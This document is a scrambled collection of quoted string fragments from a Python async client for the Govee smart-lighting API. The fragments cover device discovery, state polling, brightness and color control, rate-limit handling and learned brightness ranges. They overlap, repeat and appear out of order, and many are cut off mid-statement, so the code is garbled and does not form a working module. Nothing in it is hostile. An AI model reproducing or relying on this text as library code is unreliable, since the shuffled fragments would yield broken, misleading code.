learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device", "self._get_device(device) result = None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device:", "object: {result}\" ) else: errText = await response.text() err = f\"API-Error {response.status}: {errText}\"", "seconds. # return state from hisory for n seconds after controlling the device", "The time at which the current rate limit window resets in UTC epoch", "we will need to re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async", "pass return self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping the api endpoint.", "every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str,", "self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool,", "/ 100) if device.learned_set_brightness_max == 100: # set brightness as 0..100 brightness_set =", "err = \"unknown error: %s\" % repr(ex) if err: class error_response: def __init__(self,", "DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str", "def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close() self._session =", "so we are online self._track_rate_limit(response) # return the async content manager response yield", "color_temp < 2000 or color_temp > 9000: err = f\"set_color_temp: invalid value {color_temp},", "_LOGGER.debug(\"get_states\") for device_str in self._devices: state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error", "model: str device_name: str controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness:", "self._is_success_result_message(result) if success: 
self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff ==", "device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if (", "once.\", device.device, ) changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed:", "/ 100 ) result = self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness", "learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the learning config, possibly", "controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\"", "after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another control", "None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device {device_str}\" elif", "are offline self._set_online(False) err = \"error from aiohttp: %s\" % repr(ex) except Exception", "turn_on and turn_off.\"\"\" success = False err = None device_str, device = self._get_device(device)", "= await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device %s: %s\", device_str,", "None return self.devices async def _get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice,", "import asyncio import logging import time import math from contextlib import asynccontextmanager from", "self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: if brightness", "else: if color_temp < 2000 or color_temp > 9000: err = f\"set_color_temp: invalid", "for 
{device.device} from api allowed in {seconds_locked} seconds\" ) else: params = {\"device\":", "prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source = \"api\"", "yield response @asynccontextmanager async def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP", "\"Rate-Limit-Total\" # The maximum number of requests you're permitted to make per minute.", "{err}\") elif not command in device.support_cmds: err = f\"Command {command} not possible on", "err = await self._control(device, command, color_temp) if not err: success = self._is_success_result_message(result) if", "async def set_brightness( self, device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]:", "\"b\": blue} result, err = await self._control(device, command, command_color) if not err: success", "str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if you want", "\"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession()", "str]: \"\"\"Get state for one specific device.\"\"\" device_str, device = self._get_device(device) result =", "possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control", "= item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max =", "range 2000-9000\" else: command = \"colorTem\" result, err = await self._control(device, command, color_temp)", "device is shown as off. 
\"\"\" self._config_offline_is_off = val @property def devices(self) ->", "response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def get_devices(self) ->", "return lst def device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device", "isinstance(device, str) and device_str in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return", "math.floor( prop_brightness * 254 / 100 ) result = self._devices[device_str] result.online = prop_online", "import Any, List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION from", "result = await response.text() err = f\"API-Error {response.status}: {result}\" # cache last get_devices", "== 100: # scale range 0-100 up to 0-254 prop_brightness = math.floor( prop_brightness", "max(1, delay) else: err = f\"API-Result wrong: {result}\" else: result = await response.text()", "GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result", "command, brightness_set) if err: # try again with 0-100 range if \"API-Error 400\"", "api allowed in {seconds_locked} seconds\" ) else: params = {\"device\": device.device, \"model\": device.model}", "uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max =", "\"\"\"Get state for one specific device.\"\"\" device_str, device = self._get_device(device) result = None", "= False elif device.config_offline_is_off: # learning option prop_power_state = False # autobrightness learning", "threshold {val} must be above 1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get", "{self._limit}\" ) if val < 1: raise GoveeError(f\"Rate limiter threshold {val} must be", "enter.\"\"\" self._session = aiohttp.ClientSession() return self async def __aexit__(self, *err): 
\"\"\"Async context manager", "as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status ==", "DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another control within n seconds after", "# The number of requests remaining in the current rate limit window. _RATELIMIT_RESET", "!= online: self._online = online # inform about state change self.events.online(self._online) if not", "brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for", "after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device", "for state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0,", "success, err async def set_brightness( self, device: Union[str, GoveeDevice], brightness: int ) ->", "= self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success, err async def", "100 ): device.learned_get_brightness_max = ( 100 # assumption, as we didn't get anything", "api doesn't work if we don't sleep await asyncio.sleep(1) # set brightness as", "Tuple[bool, str]: \"\"\"Turn on a device, return success and error message.\"\"\" return await", "red > 255: err = ( f\"set_color: invalid value {color}, red must be", "again with 0-100 range if \"API-Error 400\" in err: # Unsupported Cmd Value", "rate-limiting - online/offline status \"\"\" err = None await self.rate_limit_delay() try: async with", "self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0 return", "if device.learned_set_brightness_max == 100: # set brightness as 0..100 brightness_set = brightness_set_100 
brightness_result", "0-254 prop_brightness = math.floor( prop_brightness * 254 / 100 ) result = self._devices[device_str]", "for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True # assume we are", "cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None async with self._api_get(url=_API_DEVICES) as", "device: err = f\"Invalid device {device_str}, {device}\" else: if color_temp < 2000 or", "254 / 100 ) result = self._devices[device_str] result.online = prop_online result.power_state = prop_power_state", "scale range 0-100 up to 0-254 prop_brightness = math.floor( prop_brightness * 254 /", "err = f\"API-Error {response.status} on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str}", "online self.events = Events() self._api_key = api_key self._devices = {} self._rate_limit_on = 5", "= learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off =", "state self._devices[device_str].error = None return self.devices async def _get_device_state( self, device: Union[str, GoveeDevice]", "datetime from events import Events from typing import Any, List, Optional, Tuple, Union", "= math.floor( prop_brightness * 254 / 100 ) result = self._devices[device_str] result.online =", "async def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int, int] ) ->", "range if \"API-Error 400\" in err: # Unsupported Cmd Value # set brightness", "class error_response: def __init__(self, err_msg): self._err_msg = err_msg status = -1 async def", "1000) if response.status == 200: if \"Pong\" == result: ping_ok_delay = max(1, delay)", "the api endpoint. 
No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay =", "effenctive state # defaults by some conditions if not is_retrievable: learned_get_brightness_max = -1", "not possible: {err}\") elif not command in device.support_cmds: err = f\"Command {command} not", "with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status == 200: device.lock_set_until =", "to 0-254 prop_brightness = math.floor( prop_brightness * 254 / 100 ) result =", "100 ) result = self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness =", "\"history\" result = self._devices[device_str] elif seconds_locked: # we just changed something, return state", "using an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request", "err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state", "> 255: err = f\"set_color: invalid value {color}, blue must be within 0", "def _utcnow(self): \"\"\"Helper method to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def", "100 and prop_brightness > 100 ): device.learned_get_brightness_max = ( 100 # assumption, as", "not device: err = f\"Invalid device {device_str}, {device}\" else: if brightness < 0", "429: _LOGGER.warning( f\"Rate limit exceeded, check if other devices also utilize the govee", "import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING =", "= ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text =", "= _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL +", "= {} self._rate_limit_on = 5 # safe available call 
count for multiple processes", "err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device", "{self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception as", "from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async", "item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured values", "Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model, \"cmd\": cmd}", "returned from cache: {result}, next state for {device.device} from api allowed in {seconds_locked}", "is counted down from this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate", "self._api_key} return {} @asynccontextmanager async def _api_put(self, *, auth=True, url: str, json): \"\"\"API", "f\"state object returned from cache: {result}, next state for {device.device} from api allowed", "(r, g, b) values\" else: red = color[0] green = color[1] blue =", "state. True: an offline device is shown as off. \"\"\" self._config_offline_is_off = val", "Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage,", "100) if device.learned_set_brightness_max == 100: # set brightness as 0..100 brightness_set = brightness_set_100", "DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json()", "within 0 .. 
254\" else: command = \"color\" command_color = {\"r\": red, \"g\":", "if err: _LOGGER.warning(\"error getting state for device %s: %s\", device_str, err, ) self._devices[device_str].error", "{device}\" else: if color_temp < 2000 or color_temp > 9000: err = f\"set_color_temp:", "Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False # init Dict", "requests you're permitted to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number", "= False except Exception as ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\")", "\"history\" self._devices[device_str].color = color return success, err def _get_lock_seconds(self, utcSeconds: int) -> int:", "= _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL +", "-> bool: \"\"\"Check connection to API.\"\"\" try: # this will set self.online await", "to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock =", "json_obj = await response.json() prop_online = False prop_power_state = False prop_brightness = False", "b) values\" else: red = color[0] green = color[1] blue = color[2] if", "seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. Command waiting: {cmd}\") await", "device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device:", "= item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured", "await self._turn(device, \"off\") async def _turn( self, device: Union[str, GoveeDevice], onOff: str )", "= None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device {device_str}\"", "The number of requests remaining in the current rate limit window. 
_RATELIMIT_RESET =", "device: str model: str device_name: str controllable: bool retrievable: bool support_cmds: List[str] support_turn:", "learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off", "self._config_offline_is_off = None self._learning_storage = learning_storage if not self._learning_storage: # use an internal", "headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def", "return self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a", "locked for {seconds_locked} seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device,", "in self._devices: lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice: \"\"\"Single device from", "= color[1] blue = color[2] if red < 0 or red > 255:", "def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set", "self._control( device, command, brightness_set ) if not err: device.learned_set_brightness_max = 100 await self._learn(device)", "rate limiting is active.\"\"\" # do we have requests left? 
if self.rate_limit_remaining <=", "1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\"", "try: async with request_lambda() as response: self._set_online(True) # we got something, so we", "result and result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool,", "else: command = \"color\" command_color = {\"r\": red, \"g\": green, \"b\": blue} result,", "= 5 # safe available call count for multiple processes self._limit = 100", "List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import", "and bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control", "if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state =", "{result}, next state for {device.device} from api allowed in {seconds_locked} seconds\" ) else:", "show all devices as offline for device in self.devices: device.online = False async", "is some room for other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val):", "self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return", "means there is some room for other clients. 
\"\"\" return self._rate_limit_on @rate_limit_on.setter def", "= \"Rate-Limit-Total\" # The maximum number of requests you're permitted to make per", "support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool online: bool power_state:", "init Dict and entry for device if learning_infos == None: learning_infos = {}", "GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL +", "= online # inform about state change self.events.online(self._online) if not online: # show", "device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s is", "\"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger", "limit window resets in UTC epoch seconds. # return state from hisory for", "timestamp = self._utcnow() json_obj = await response.json() prop_online = False prop_power_state = False", "error message.\"\"\" return await self._turn(device, \"off\") async def _turn( self, device: Union[str, GoveeDevice],", "you're permitted to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of", "= {\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL,", "blue = color[2] if red < 0 or red > 255: err =", "set self.online await self.ping() except: pass return self.online async def ping(self) -> Tuple[float,", "is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager", "# use an internal learning storage as long as we run. 
# we", "request was able to connect to the API.\"\"\" return self._online def _set_online(self, online:", "self, device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness to", "%s is assumed. If the brightness slider doesn't match the actual brightness pull", "err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice],", "elif seconds_locked: # we just changed something, return state from history self._devices[device_str].source =", "api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if you", "): \"\"\"Init with an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION)", "learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off #", "else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is", "some conditions if not is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on", "( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for", "\"brightness\" result, err = await self._control(device, command, brightness_set) if err: # try again", "> 0 return success, err async def _learn(self, device): \"\"\"Persist learned information from", "int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the", "err async def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int, int] )", "def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, 
str]: \"\"\"Turn on a device, return", "self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return", "next state for {device.device} from api allowed in {seconds_locked} seconds\" ) else: params", "in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET])", "storage as long as we run. # we will need to re-learn every", "limit will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate", ") as response: if response.status == 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS", "= ( 100 # assumption, as we didn't get anything higher ) if", "green < 0 or green > 255: err = f\"set_color: invalid value {color},", "invalid value {color}, green must be within 0 .. 254\" elif blue <", "self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield response @asynccontextmanager", "be reset.\"\"\" return self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger", "\"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if", "with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield response", "bool: \"\"\"Given an aiohttp result checks if it is a success result.\"\"\" return", "{self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error", "= device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned", "in 
item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults", "use an internal learning storage as long as we run. # we will", "= await response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in", "finished with the Client without using an async context manager.\"\"\" await self.__aexit__() def", "= 2 # do not send another control within n seconds after controlling", "\"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum", "+ \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API rate limit header keys", "requests left? if self.rate_limit_remaining <= self.rate_limit_on: # do we need to sleep? sleep_sec", "device {device_str}\" elif not device.retrievable: # device {device_str} isn't able to return state,", "controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another control within", "0 .. 
254\" else: command = \"color\" command_color = {\"r\": red, \"g\": green,", "time at which the current rate limit window resets in UTC epoch seconds.", "want to use this Client without an async context manager.\"\"\" self = Govee(api_key,", "retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in", "self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success, err def _get_lock_seconds(self, utcSeconds:", "self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total:", "int] ) -> Tuple[bool, str]: \"\"\"Set color (r, g, b) where each value", "reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be", "def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self,", "online: # show all devices as offline for device in self.devices: device.online =", "devices = {} err = None async with self._api_get(url=_API_DEVICES) as response: if response.status", "brightness > 254: err = f\"set_brightness: invalid value {brightness}, allowed range 0 ..", "0 .. 
254\" elif blue < 0 or blue > 255: err =", "device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for", "< 0 or green > 255: err = f\"set_color: invalid value {color}, green", "tuple with (r, g, b) values\" else: red = color[0] green = color[1]", "= learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"],", "self._control(device, command, brightness_set) if err: # try again with 0-100 range if \"API-Error", "== 100: # set brightness as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100", "value {color_temp}, allowed range 2000-9000\" else: command = \"colorTem\" result, err = await", "= \"Rate-Limit-Reset\" # The time at which the current rate limit window resets", "response @asynccontextmanager async def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP Get", "device.device if not device_str in self._devices: device = None # disallow unknown devices", "_LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if limit_unknown: self._limit_remaining -= 1 async", "await self.__aenter__() return self async def close(self): \"\"\"Use close when your are finished", "limit exceeded, check if other devices also utilize the govee API\" ) limit_unknown", "config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global", "color[2] if red < 0 or red > 255: err = ( f\"set_color:", "GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async", "values if device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max =", "f\"state 
returned from API: {json_obj}, resulting state object: {result}\" ) else: errText =", "range 0-255 \"\"\" success = False err = None device_str, device = self._get_device(device)", "self._control(device, command, params) success = False if not err: success = self._is_success_result_message(result) if", "class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session", "result = await response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for item", "threshold {val} must be below {self._limit}\" ) if val < 1: raise GoveeError(f\"Rate", "request_lambda() as response: self._set_online(True) # we got something, so we are online self._track_rate_limit(response)", "Union[str, GoveeDevice], command: str, params: Any ) -> Tuple[Any, str]: \"\"\"Control led strips", "when device is offline. None: default, use config_offline_is_off from learning, or False by", "- start) * 1000) if response.status == 200: if \"Pong\" == result: ping_ok_delay", "result self._devices = devices return self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) ->", "None: learning_infos = {} if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() #", "str]: \"\"\"Turn on a device, return success and error message.\"\"\" return await self._turn(device,", "\"\"\"Turn on a device, return success and error message.\"\"\" return await self._turn(device, \"on\")", "-> Tuple[float, str]: \"\"\"Ping the api endpoint. 
No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start", "a call when rate limiting is active.\"\"\" # do we have requests left?", "device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until)", "object returned from cache: {result}, next state for {device.device} from api allowed in", "def config_offline_is_off(self, val: bool): \"\"\" Set global behavour when device is offline. None:", "return await self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]:", "await asyncio.sleep(1) # set brightness as 0..254 brightness_set = brightness brightness_result = brightness_set", "self async def close(self): \"\"\"Use close when your are finished with the Client", "\"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not", "response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls. 
This", "success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result", "= GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in", "if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check if other devices also", "GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None,", "a device, return success and error message.\"\"\" return await self._turn(device, \"off\") async def", "bool config_offline_is_off: bool # this is the learning config, possibly overridden by a", ") as response: yield response @asynccontextmanager async def _api_get(self, *, auth=True, url: str,", "str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success = False err = None device_str,", "= await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"]", "254\" else: if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't", "an event on change.\"\"\" if self._online != online: self._online = online # inform", "0 or red > 255: err = ( f\"set_color: invalid value {color}, red", "state property '{prop}'\") if not prop_online: if self.config_offline_is_off is not None: # global", "the current rate limit window resets in UTC epoch seconds. 
# return state", "in response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit", "device: err = f\"Invalid device {device_str}, {device}\" else: if not device.controllable: err =", "int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this", "\"\"\" err = None await self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True)", "= None async with self._api_get(url=_API_PING, auth=False) as response: result = await response.text() delay", "-> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock", "we got something, so we are online self._track_rate_limit(response) # return the async content", "anything higher ) if prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device) if", "return success, err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\"", "\"\"\" device_str = device if isinstance(device, GoveeDevice): device_str = device.device if not device_str", "float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown", "state # defaults by some conditions if not is_retrievable: learned_get_brightness_max = -1 if", "self._utcnow() json_obj = await response.json() prop_online = False prop_power_state = False prop_brightness =", "self, device: Union[str, GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set", "lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield response @asynccontextmanager async", "await self._learn(device) if device.learned_get_brightness_max == 100: # scale range 0-100 up to 0-254", "if not device_str in self._devices: device = None # disallow unknown 
